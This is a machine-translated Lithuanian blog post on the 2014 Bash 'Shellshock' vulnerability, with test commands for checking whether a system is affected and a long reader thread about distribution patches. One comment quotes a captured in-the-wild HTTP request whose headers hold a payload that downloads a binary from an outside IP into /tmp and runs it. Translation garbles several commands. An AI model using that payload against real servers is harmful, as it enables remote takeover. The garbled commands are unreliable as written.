„Bash“: aptiktas (ir ištaisytas) naujas pažeidžiamumas

Kai kuriuose tinklaraščiuose jis veikia kaip žaibas, istorija paskelbta saugumo tinklaraštis de "Red Hat" apie „Bash“ rastą pažeidžiamumą dėl netinkamo pasaulinių kintamųjų naudojimo. Remiantis pirminėmis naujienomis:

„… Pažeidžiamumas yra dėl to, kad aplinkos kintamuosius su specialiai sukurtomis reikšmėmis galima sukurti prieš iškviečiant„ bash “apvalkalą. Šiuose kintamuosiuose gali būti kodas, kuris vykdomas iškart, kai iškviečiamas apvalkalas. Šių parengtų kintamųjų pavadinimas neturi reikšmės, tik jų turinys. Todėl šis pažeidžiamumas atsiskleidžia daugeliu atvejųPavyzdžiui:

  • „ForceCommand“ jis naudojamas sshd konfigūracijose, siekiant suteikti ribotas komandų vykdymo galimybes nuotoliniams vartotojams. Šis trūkumas gali būti naudojamas siekiant to išvengti ir savavališkai vykdyti komandą. Kai kurie „Git“ ir „Subversion“ diegimai naudoja tokius ribotus apvalkalus. Reguliariam „OpenSSH“ naudojimui tai neturi įtakos, nes vartotojai jau turi prieigą prie konsolės.
  • Apache serveris, naudojant mod_cgi arba mod_cgid, bus paveiktas, jei CGI scenarijai bus parašyti tiek bash, tiek spawn pakopose. Tokius pakopus netiesiogiai naudoja sistema / popen C sistemoje, os.system / os.popen Python sistemoje, jei naudojate sistemos / exec apvalkalą PHP (kai veikia CGI režimu), o „Perl“ atidarykite / system (tai priklauso nuo komandų eilutės).
  • PHP scenarijai, vykdomi naudojant mod_php, neturi įtakos, net jei žaidžiami pakopiniai lygiai.
  • DHCP klientai, norėdami konfigūruoti sistemą, naudoja „shell“ scenarijus, kurių reikšmės paimtos iš potencialiai kenksmingo serverio. Tai leistų DHCP kliento kompiuteryje vykdyti savavališkas komandas, paprastai kaip šaknines.
  • Įvairūs demonai ir programos su SUID privilegijomis gali vykdyti apvalkalo scenarijus su aplinkos kintamųjų reikšmėmis, kurias nustatė / įtakojo vartotojas, o tai leistų vykdyti savavališkas komandas.
  • Bet kuri kita programa, sujungianti apvalkalą arba vykdanti apvalkalo scenarijų, pvz., Naudojant „bash“ kaip vertėją. „Shell“ scenarijai, kurie neeksportuoja kintamųjų, nėra pažeidžiami šios problemos, net jei jie apdoroja nepatikimą turinį ir jį saugo apvalkalo kintamieji (kairėje) ir sublygiai atidaromi.

... "

Kaip sužinoti, ar tai paveikė mano „Bash“?

Atsižvelgiant į tai, yra labai paprastas būdas sužinoti, ar mus veikia šis pažeidžiamumas. Tiesą sakant, aš išbandžiau savo „Antergos“ ir, matyt, neturiu jokių problemų. Ką turime padaryti, tai atidaryti terminalą ir įdėti:

env x = '() {:;}; aidas pažeidžiamas "bash -c" aidas tai yra bandymas "

Jei taip išeina, mes neturime jokių problemų:

env x = '() {:;}; echo pažeidžiamas 'bash -c "aidas tai yra bandymas" bash: įspėjimas: x: ignoruojant funkcijos apibrėžimo bandymą bash: klaida importuojant funkcijos x apibrėžimą x tai bandymas

Jei rezultatas skiriasi, turėtumėte naudoti mūsų pageidaujamų paskirstymų naujinimo kanalus, kad sužinotumėte, ar jie jau pritaikė pataisą. Taigi jūs žinote 😉

Atnaujinta: Tai yra kolegos, naudojančio „Ubuntu“ 14:04, išvestis:

env x = '() {:;}; aidas pažeidžiamas 'bash -c "aidas tai bandymas" pažeidžiamas tai bandymas

Kaip matote, kol kas jis yra pažeidžiamas.


Palikite komentarą

Jūsų elektroninio pašto adresas nebus skelbiamas. Privalomi laukai yra pažymėti *

*

*

  1. Atsakingas už duomenis: Miguel Ángel Gatón
  2. Duomenų paskirtis: kontroliuoti šlamštą, komentarų valdymą.
  3. Įteisinimas: jūsų sutikimas
  4. Duomenų perdavimas: Duomenys nebus perduoti trečiosioms šalims, išskyrus teisinius įsipareigojimus.
  5. Duomenų saugojimas: „Occentus Networks“ (ES) talpinama duomenų bazė
  6. Teisės: bet kuriuo metu galite apriboti, atkurti ir ištrinti savo informaciją.

  1.   gerson sakė

    Aš turiu „Kubuntu 14.04“ iš 64 ir taip pat gaunu:

    env x = '() {:;}; aidas pažeidžiamas "bash -c" aidas tai yra bandymas "
    pažeidžiamas
    čia testas

    Aš jau atnaujinau, bet tai netaiso. Ką daryti?

    1.    gyvas sakė

      Palaukite, kol jie atnaujins. Jau atnaujinta eOS, pvz., Atnaujinta .. 😀

    2.    Jonas sakė

      Kaip keista, aš taip pat turiu „Kubuntu 14.04“

      $ env x = '() {:;}; aidas pažeidžiamas "bash -c" aidas tai yra bandymas "
      bash: įspėjimas: x: ignoruojamas bandymas apibrėžti funkciją
      „bash“: klaida importuojant „x“ funkcijos apibrėžimą
      čia testas

      1.    Jonas sakė

        Pridedu, kad šiandien atsisiųsta „bash“ paketo versija yra:
        4.3

        http://packages.ubuntu.com/trusty/bash

    3.    3000 sakė

      Mano atveju, suteikiant komandą, man tiesiog suteikiama ši informacija terminale:

      >

      Bet kokiu atveju, pokštas yra tas, kad atnaujinau „Debian Wheezy“ ir tai mane išmetė.

      1.    Jukiteru sakė

        Švokštimas vis dar yra pažeidžiamas antrosios klaidos dalies, bent jau popietei (UTC -4: 30), problema vis dar buvo tokia: /

  2.   peterčekas sakė

    Aš ką tik patikrinau, ar šį rytą pritaikius naujinį, „Slackware“, „Debian“ ir „Centos“ neturi įtakos, nes jie gavo atitinkamą naujinį.

    Kas daro „Ubuntu“ vis dar pažeidžiamą šią valandą? Ir pasakyk, kad tai saugu: D.

    1.    Jonas sakė

      Bet ar bandėte atnaujinti „Ubuntu“?
      Su šios dienos atnaujinimu jie taip pat pataisė.

      1.    peterčekas sakė

        OK

    2.    robotas sakė

      Saugumo ekspertai įspėja apie „Bash“ pažeidžiamumą, nes tai gali kelti didesnę grėsmę „Linux“ programinės įrangos vartotojams nei „Heartbleed“ klaida, kur „įsilaužėliai“ gali panaudoti „Bash“ klaidą, kad galėtų visiškai kontroliuoti sistemą.
      Kibernetinio saugumo firmos „Rapid7“ inžinerijos vadovas Todas Beardsley įspėjo, kad trūkumas buvo įvertintas 10 pagal jo sunkumą, o tai reiškia, kad jis turi maksimalų poveikį, ir įvertintas kaip „žemas“ už išnaudojimo sudėtingumą, o tai reiškia, kad „įsilaužėliams“ yra gana lengva. atakų. Naudodamiesi šia spraga užpuolikai gali perimti operacinės sistemos kontrolę, pasiekti konfidencialią informaciją, atlikti pakeitimus ir pan. “, - sakė Beardsley. „Kiekvienas, turintis sistemas, kurios užima„ Bash “, turėtų nedelsdamas uždėti pleistrą“, - pridūrė jis.
      PRIEŠ ŠĮ PAJAMUMĄ, KURIUO PRISTATOMAS SENASIS ĮRANKIS (GNU), kuriame yra Bachas, „Linux“ programinei įrangai būtų patogiau atsikratyti GNU ir pakeisti BSD įrankį.

      Ne CENORUOKITE mano žodžio laisvės, ... neįžeidinėkite nieko, ... neištrinkite mano pranešimo kaip ankstesnio pranešimo, kurį ištryniau!

      1.    „Xerix“ sakė

        O prašau, nepersistenk. Kaip nekenčiu tų žmonių, kurie naudoja BSD ir niekina GNU, „Linux“ ar bet ką iš šių projektų.

      2.    peterčekas sakė

        Aš esu su jumis ir esate visiškai teisus dėl šios skylės sunkumo.

      3.    diazepanas sakė

        Tai nebuvo cenzūra, o atleidimas (tą patį komentarą pateikėte gnome 3.14 įraše)

      4.    Personalas sakė

        «... Ir įvertino išnaudojimo SUDĖTINGUMĄ„ MAŽAI “, o tai reiškia, kad įsilaužėlių atakoms tai palyginti LENGVAI»

        Ar pastebimas nesuderinamumas?
        Kaip galima lengvai išnaudoti pažeidžiamumą ir tuo pačiu rizikuoti „žemai“, nes jį naudoti taip sudėtinga?
        Tai klaida, kuri buvo pašalinta per kelias valandas nuo susitikimo ir kuri, kaip ir nuoširdi, neturi pranešimų apie tai, kad būtų išnaudota (žinoma, tai turi mažiau laiko pažinti vienas kitą).
        Tai daugiau bulvarinė spauda nei reali rizika.

      5.    peterčekas sakė

        Ar @Staff jums atrodo nesvarbus? Ką man dabar pasakysi?

        GAUTI./.HTTP/1.0
        . Vartotojo atstovas:. Ačiū, Rob
        . Slapukas: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Šeimininkas: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        Referentas: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Priimti:. * / *

        $ failas „nginx“
        „nginx“: ELF 32 bitų LSB vykdomoji programa, „Intel 80386“, 1 versija (SYSV), statiškai susieta, skirta GNU / Linux 2.6.18, pašalinta

        $md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $sha256sum nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        Ar žinote, kas tai yra? Iš mažai pavojingo nieko ...

      6.    Jukiteru sakė

        Situacija yra gana rimta, bet iš ten sakau, kad turėtumėte nustoti naudoti „bash“ BSD parinkčiai, tai jau yra ne daugiau, vistiek atnaujinimas jau yra, aš tiesiog paliečiu atnaujinimą ir nieko daugiau.

        Dabar PD, manau, kad tai daugiau kolega @robet, nemanau, kad čia administratoriai yra pasiryžę ištrinti tokius komentarus, nes taip, nes nuo tada, kai dalyvavau šioje bendruomenėje, turėjau tokį jausmą ir tikiuosi, kad taip ir liks būdu.

        Sveikinimai.

      7.    gyvas sakė

        Tą patį komentarą pateikėte ir dviem skirtingiems įrašams. Jei bandote reklamuoti istorijos „šaltinį“, atsiprašau, čia ne ta vieta.

      8.    Mario sakė

        Bashas kilęs iš „Unix“ (ir jo GNU klono). Taip pat paveiktos BSD pagrįstos sistemos, tokios kaip OSX, ir, pasak „Genbeta“, jos dar netaisė. Be to, norint pasiekti „Bash“, jums reikia vietinės arba per SSH vartotojo paskyros.

      9.    Jukiteru sakė

        @Staffas:

        1.- Jis priskiriamas 10 lygiui (didžiausias pavojaus lygis) dėl paslaugų, kurias gali paveikti klaida, kiekio. Pagrindinėje pastaboje jie tai labai aiškiai nurodo, teigdami, kad klaida gali paveikti tokias paslaugas kaip apache, sshd, programas su suid leidimais (be kita ko, xorg).

        2. - Kalbant apie jo įgyvendinimą, jis priskiriamas žemo lygio sunkumams, o geriausias to pavyzdys yra pažeidžiamumo testo scenarijus, kurį @elav įdėjo į įrašą. Labai sunku įgyvendinti nėra, kaip matote.

        Aš nematau informacijos pertekliaus (matau tik „Google“ vertimą) ir jei problema yra gana rimta, ir kaip jūs sakote, ji jau turi pleistrą ir sprendimą, bet ne tam, tai nebėra rizika, ir visai tikras.

      10.    Personalas sakė

        @ Petercheco / @ Yukiteru

        Neaiškinkite manęs klaidingai, manau, kad akivaizdu, kad mano kritika yra naujiena, kurią Robet susieja ir yra orientuota į neatitikimą, o ne į atleidimą.

        Lygiai taip pat turime atskirti riziką ir pavojų (pastarojo neminėsiu), dažniausiai juos vartojame kaip sinonimus, tačiau čia pavojus būtų klaidos sugadinimo pajėgumas ir rizika, kad ji atsiras.
        Konkrečiu atveju įėjau iš vakar. Tai nebuvo skirta pašto adresų sąrašams ar panašiai. Tai buvo skirta darbalaukio platintojui! Paėmiau telefoną ir nusiunčiau pranešimą sistemai su nuoroda ir patvirtinau, kad jau viską užtaisiau, tada atleiskite, bet šios naujienos manęs nemiega.

      11.    robotas sakė

        Kituose forumuose jie mini apie „Bash“ pažeidžiamumą, „sprendimą, kurį išleido Debianas ir„ Ubuntu “, tačiau šiandien jie atrado, kad pažeidžiamumas vis dar egzistuoja, todėl sprendimas buvo neišsamus, jie tai mini!

        Matau, kad daugelis mane kritikavo dėl paprasčiausio fakto, kad neleidžiu žmonėms patekti į pažeidžiamumo laipsnį, kuris atitinka 10 didžiausio pavojingumo lygį, ir paminėjo galimus „Linux“ programinės įrangos sprendimus prieš pasenusį GNU įrankį, kuriame talpinamas „Bash“ - kuris puikiai galėtų būti GNU būti pakeistas „BSD“ įrankiu „Linux“ programinėje įrangoje ... Aš taip pat naudoju „Linux“ ir man patinka „Linux“!

        Aš paaiškinu, kad Bash nėra numatytasis įdiegtas BSD, tai dar vienas „Linux“ suderinamumo paketas, kurį galima įdiegti BSD ... taip! Šaltinis dedamas taip, kad jie galėtų patikrinti naujienas, nes daugelis vartotojų kartais netiki žinute ar komentarais.

        1.    gyvas sakė

          robetas: Kaip jie jums jau sakė ne kartą, jūs jau įdėjote savo komentarą su naujienomis į įrašą, jūs neturite jo dėti į kiekvieną įrašą, kurį komentuojate.

          Bash'e yra ir kitų kriauklių, kurias galima naudoti tuo atveju, jei Bashas yra pažeidžiamas. 😉

      12.    Mario sakė

        Robete, aš žinau, kad nėra jokios programinės įrangos, kuri sujungtų „Linux“ branduolį su „BSD“ naudotoju. Artimiausias dalykas yra atvirkščiai - kBSD + GNU, kaip tai daro „Gentoo“ ir „Debian“. Be to, GNU (1983) negalima pavadinti „senamadišku“, jei tai yra po BSD (1977). Jie abu dalijasi savo „unix“ šaknimi (bet ne kodu), „Linux suderinamumo“ nebūtų, jei „Bash“ būtų sukurtas, kai Linusas T dar buvo vaikas.

  3.   manuelperez sakė

    Šiuo metu „Debian“ testavimas yra „pažeidžiamas“, kokį brūkšnį turime ...

    1.    mrcelhw sakė

      Aš naudoju „Debian Testing“ ir net šiame skyriuje mes gavome „bash“ atnaujinimą

  4.   diazepanas sakė

    pagal genbeta yra ir dar vienas pažeidžiamumas
    http://seclists.org/oss-sec/2014/q3/685

    komanda pasikonsultuoti yra
    env X = '() {(a) => \' sh -c "pažeidžiamas aidas"; bash -c "aido gedimas 2 nepašalintas"

    1.    gyvas sakė
      env X = '() {(a) => \' sh -c "aidas pažeidžiamas"; bash -c "echo Nepašalinta gedimas 2" sh: X: 1 eilutė: sintaksinė klaida šalia netikėto elemento "=" sh: X: 1 eilutė: "" sh: klaida importuojant "X" funkcijos apibrėžimą sh - Pažeidžiama - 2 gedimas nepašalintas komanda nerasta
      
      1.    diazepanas sakė

        tas pats aš.

      2.    Giskardas sakė

        Tas pats čia. Tačiau originali įrašo klaida buvo užtaisyta (L) Ubuntu 14.04

      3.    x11tete11x sakė

        Užuot atlikęs paprastą aidą, bandydamas priversti įvykdyti instrukciją, kuriai reikalingos privilegijos, aš išmetu „nepakankamas privilegijas“ ... ši klaida nepašalina privilegijų? Jei ji nepadidina privilegijų, tai nėra taip pavojinga, kaip jie ją piešia.

      4.    Xurxo sakė

        Tu teisus!! jie buvo du pažeidžiamumai ...

        Man po „Linux Mint 17“ po antrojo „bash“ atnaujinimo, kurį jie įdėjo į „Ubuntu“ saugyklas praėjusią naktį, įvykdžius šią komandą, apvalkalas siūlo šį išėjimą:

        env X = '() {(a) => \' sh -c "aidas pažeidžiamas"; bash -c "echo Fail 2 nepataisytas"
        >

        „Bassh“ versija, įdėta į „Ubuntu“ saugyklas norint atnaujinti ankstesnes, yra tokia:

        4.3

        „Debian“ išvestinėse sistemose galite patikrinti įdiegtą versiją naudodami šią komandą:

        dpkg -s bash | grep versija

        Bet kokiu atveju tai turėtų būti paaiškinta, bent jau Debian, Ubuntu ir Mint naudotojams; Jums nereikėtų per daug rūpintis programomis, kurios paleidžia scenarijus su antrašte #! / Bin / sh, nes tuose paskirstymuose / bin / sh nevadina „bash“, bet jungiasi prie apvalkalo „brūkšnys“ (brūkšnys yra :)

        „Debian Alchemist Console“ (brūkšnys) yra išvestinė POSIX konsolė
        pelenų.
        .
        Kadangi scenarijus vykdomas greičiau nei „bash“, jis turi mažiau priklausomybių
        bibliotekų (todėl ji yra tvirtesnė nuo programinės įrangos gedimų ar
        aparatinė įranga), jis naudojamas kaip numatytoji sistemos konsolė sistemose
        Debianas.

        Taigi, bent jau „Ubuntu“, „bash“ naudojamas kaip apvalkalas vartotojo prisijungimui (taip pat ir root vartotojui). Bet kuris vartotojas pagal numatytuosius nustatymus gali naudoti kitą apvalkalą vartotojui ir šaknies konsolėms (terminalams).

        Lengva patikrinti, ar apvalkalas vykdo scenarijus (#! / Bin / sh) vykdydamas šias komandas:

        file / bin / sh
        (išvestis yra / bin / sh: simbolinė nuoroda į „brūkšnį“) sekame pėdsaką kartodami komandą

        failas / šiukšliadėžė / brūkšnys
        (išvestis yra / bin / dash: ELF 64 bitų LSB bendras objektas, x86-64, 1 versija (SYSV), taigi tai yra vykdomasis failas.

        Tai yra „Linux Mint 17.“ paskirstymo rezultatai. Kituose, ne „Ubuntu“ / „Debian“ pagrįstuose, paskirstymuose jie gali būti skirtingi.

        Nesunku pakeisti numatytąjį apvalkalą !! vartotojams ir pagrindiniam vartotojui netgi galite naudoti kitą. Tiesą sakant, jūs tiesiog turite įdiegti pasirinktą apvalkalą ir pakeisti numatytąjį naudodami komandą „chsh“ arba redaguodami failą / etc / passwd (nors vartotojai, nežinodami klaidos padarinių redaguodami „passwd“ failą, Geriau labai gerai informuoti save ir prieš jį redaguojant pasidaryti originalo kopiją, jei reikia jį atkurti).

        Jaučiuosi patogiau su „tcsh“ (tcsh is :)

        TENEX C konsolė, patobulinta „Berkeley csh“ versija

        „Csh“ yra tai, ką prieš kelerius metus naudojo „Mac OS X“. Tai prasminga atsižvelgiant į tai, kad didžioji „Apple“ operacinės sistemos dalis yra „FreeBSD“ kodas. Iš to, ką skaičiau vakar, atrodo, kad jie taip pat teikia „bash“ vartotojo terminalams.

        IŠVADOS:

        - Pataisytos „bash“ versijos „dažniausiai naudojamiems paskirstymams“ jau buvo išplatintos
        - "bash" 4.3-7ubuntu1.2 ir vėlesnėse versijose šių klaidų nėra
        - OS * Linux naudoti „bash“ nėra privaloma
        - Keletas * „Linux“ paskirstymų susieja #! / Bin / sh su „bash“
        - Yra alternatyvų: pelenai, brūkšnys, csh, tcsh ir dar keli
        - Nesudėtinga pakeisti numatytąjį apvalkalą, kurį sistema iškviečia atidarant terminalą
        - Mažai mažų įrenginių (maršrutizatorių ir kitų) naudoja „bash“, nes jis yra labai didelis !!

      5.    Xurxo sakė

        Šiuo metu ką tik atėjo kitas atnaujinimas, kuriame įdiegiama kita „bash“ 4.3-7ubuntu1.3 versija

        Skirta „Linux Mint 17“ ir „Ubuntu 14.04.1 LTS“

        1.    gyvas sakė

          „ArchLinux“ įvedė versiją bash-4.3.026-1

    2.    robotas sakė

      @ Xurxo… .csh iš Berkeley?,… Jūs suprantate ką nors iš to, ką kalbu aukščiau, ir geriau naudoti BSD „csh“ ..., o ne seną GNU įrankį, kuriame talpinamas „Bash“. Šis įrankis yra geriausias „Linux“ programinei įrangai.

  5.   bevardis sakė
  6.   Gonzalo sakė

    O koks būtų sprendimas?

    1.    gyvas sakė

      Palaukite, kol jie atnaujins jūsų platintojo paketą 😉

  7.   diazepanas sakė

    Klaida buvo pakrikštyta kaip kriauklė
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   Pablo Ivanas Correa sakė

    pažeidžiamas
    čia testas

    Kol kas nėra „Ubuntu Studio 14.04“ pleistro

    1.    Wisp sakė

      Taisyta „Ubuntu Studio“ 14.04.1
      wisp @ ubuntustudio: ~ $ env x = '() {:;}; aidas pažeidžiamas "bash -c" aidas tai yra bandymas "
      bash: įspėjimas: x: ignoruojamas bandymas apibrėžti funkciją
      „bash“: klaida importuojant „x“ funkcijos apibrėžimą
      čia testas

  9.   kelininkas sakė

    Tiesą sakant, tai yra nedidelis pažeidžiamumas, jei jis jus veikia, tai, kad anksčiau darėte kažką blogo ...

    Nes bash scenarijus, kuris veikia su root teisėmis, niekada neturėtų būti atskirtas vartotojui. Ir jei jis bėga be privilegijų, tokio apgaulingumo nėra. Tiesą sakant, tai kvaila. Daug bauginanti.

    1.    „Xerix“ sakė

      Aš manau taip pat.

    2.    Personalas sakė

      Tiksliai, norint parduoti daugiau laikraščių ar sulaukti daugiau apsilankymų, šios klaidos yra geros.
      Tačiau jie visada pamiršta paminėti, kad norint pakenkti kompiuteriui naudojant tokio tipo scenarijus, pirmiausia turite turėti prieigą prie „bash“, o tada turėti jį kaip šakninę.

      1.    Daryo sakė

        personalas, jei naudojate apache su cgi, tiesiog įdėkite http antraštes kaip slapukus arba persiųskite norimą vykdyti funkciją. Jis netgi buvo naudojamas kirminams platinti.

    3.    Daryo sakė

      ir jei kas nors įdeda apvalkalą į serverį su „wget mishell.php“, tai tokiu atveju tai nėra rimta, ar ne?

    4.    3000 sakė

      Sutinku su jumis. Maniau, kad tai didžiulė klaida, tokia kaip „Heartbleed“ (net NSA paskolino save sergamumui skatinti), bet vis dėlto tai buvo nedidelė klaida.

      Yra ir kitų tikrai rimtų klaidų, tokių kaip beprotiškas „Flash“ vartojimas, „Pepper Flash Player“ našumas ir jau pataisyta „webRTC“ klaida „Chrome“ ir „Firefox“.

  10.   Rišėjas sakė

    Ar žinote, ar ji yra skirta žmonėms, turintiems „Linux Mint 16“?

  11.   Oskaras sakė

    „Debian“ bandymuose tai jau buvo pataisyta.

  12.   yoyo sakė

    Mano 5 rajonuose tai išspręsta, OS X nežinau.

    Prašau necenzūruoti mano komentaro, sakiau „OS X“. Nežinau, ar šioje svetainėje galite pasakyti „OS X“.

    1.    tanhauzeris sakė

      @yoyo gerai nesijaudink per daug, kad jie vis dar dirba su kai kuriomis pleistro detalėmis ... pabandykite tai ir tada pasakykite man, eik XD

      env x = '() {:;}; „Aš esu labiau pažeidžiama nei„ iPhone 6 “šiukšliadėžė“

      Kad jei jie tai išspręs 100% prieš OS X, aš bet ką lažinuosi

    2.    3000 sakė

      Na, net „Ars Technica“ jie suteikia svarbą „Bash“ OSX.

    3.    gyvas sakė

      @Yoyo kitas OS X komentaras, skirtas šlamštui .. lla tu save .. 😛

  13.   tanhauzeris sakė

    @yoyo ten pataisyti kabutes ... bet visa kita zinai 😉

    1.    3000 sakė

      Lyg jie taptų OSX globėjais (nes OSX vis dar naudoja „Bash“: v).

      Bet kokiu atveju, aš neturiu tiek daug susipainioti su Debian Jessie.

  14.   elhui2 sakė

    Jei „Cent OS“ sistema yra pažeidžiama:
    yum clean all && yum update bash

    norėdami pamatyti bash versiją:
    aps. -qa | grep bash

    Jei versija yra ankstesnė nei bash-4.1.2-15.el6_5.1, jūsų sistema gali būti pažeidžiama!

    Sveikinimai.

  15.   manuelperez sakė

    2-asis pažeidžiamumas dar neišspręstas

    env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "aido gedimas 2 nepašalintas"

  16.   Jėzus Peralesas sakė

    Atnaujinama ...

  17.   jungiklis sakė

    „Gentoo“ man nutinka priešingai, esu pažeidžiamas tik dėl pirmosios nesėkmės, bet su antrąja tai gaunu:
    [kodas] sh: X: 1 eilutė: sintaksinė klaida šalia netikėto elemento „=“
    sh: X: 1 eilutė: "
    sh: klaida importuojant „X“ funkcijos apibrėžimą
    sh: pažeidžiamas: komanda nerasta
    2 klaida netaisyta
    [/ kodas]
    Nežinau, ar jau bus stabili „Bash“ versija su ištaisytomis klaidomis, bet bet kuriuo atveju ji bus laukiama kitą kartą, kai atliksiu „emerge –sync && emerge –update –deep –with-bdeps = ir - newuse @world (taip aš atnaujinu visą sistemą).

    1.    Jukiteru sakė

      Turiu „Gentoo“ su versija 4.2_p50 ir iki šiol ji išlaikė visus bandymus. Pabandykite atsirasti –sync, tada atsiraskite -av1 app-shells / bash ir patikrinkite, ar turite 4.2_p50 versiją naudodami komandą bash –version.

  18.   Fer sakė

    Ar bandėte tai?

    Su naujais paketais, nauju testu, kurį mums teikia „Red Hat“

    cd / tmp; rm -f / tmp / aidas; env 'x = () {(a) => \' bash -c "aido data"; katė / tmp / aidas

    Jei mūsų sistema nėra pažeidžiama ir buvo tinkamai užtaisyta, ji turi duoti mums kažką panašaus
    1 data
    2 katė: / tmp / echo: failo ar katalogo nėra

  19.   Jukiteru sakė

    Išbandykite taip:

    env X = '() {(a) => \' sh -c "pažeidžiamas aidas"; bash -c "pataisytas 2 aido gedimas"

    Suprantu

    pažeidžiamas
    2 klaidą užtaisyta.

    1.    Jukiteru sakė

      Pamirškite, eilutė yra blogai suformatuota.

  20.   Oskaras Meza sakė

    Puiku! Aš jau atnaujinau savo „Slackware“, ačiū!

  21.   Lotbrokas sakė

    Sveiki, kyla klausimas, turiu kelis serverius su 10 bitų „SUSE Linux Enterprise Server 64“.
    Vykdydamas komandas esu pažeidžiamas, esu dar labiau pažeidžiamas nei šiukšliadėžė „iPhone 6 xD“
    Jei neklystu atnaujindamas / įdiegdamas paketus SUSE, tai daroma naudojant komandą «zypper».

    Kai kuriuose serveriuose man tai sakoma:

    BIAL: ~ # užtrauktukas
    -bash: zypper: komanda nerasta
    BIAL: ~ #

    O kituose tai:

    SMB: ~ # užtrauktukas
    Atkuriami sistemos šaltiniai ...
    Analizuojami „SUSE Linux Enterprise Server 10“ SP2-20100319-161944 metaduomenys ...
    Analizuojamas RPM duomenų bazė ...
    santrauka:
    Nėra ką veikti.

    Ką aš darau?
    Aš žinau, kad kai kurie sako, kad pažeidžiamumas yra mažesnis už tą, kurį jie piešia, bet aš jį turiu ir nenoriu, kad rizika būtų maža ar didelė.

    Sveikinimai.

  22.   Sanders gutierrez sakė

    Labas vakaras, bandžiau įklijuoti kodą, kurį pateikėte straipsnyje, suprantu
    šlifuokliai @ pc-šlifuokliai: ~ $ env x = '() {:;}; aidas pažeidžiamas "bash -c" aidas tai yra bandymas "
    čia testas
    šlifuokliai @ kompiuteriniai šlifuokliai: ~ $
    Ar galėtumėte man paaiškinti, kaip pataisyti distro, aš atnaujinu kasdien ir nematau raginimo išvesties pokyčių.

    Labai ačiū!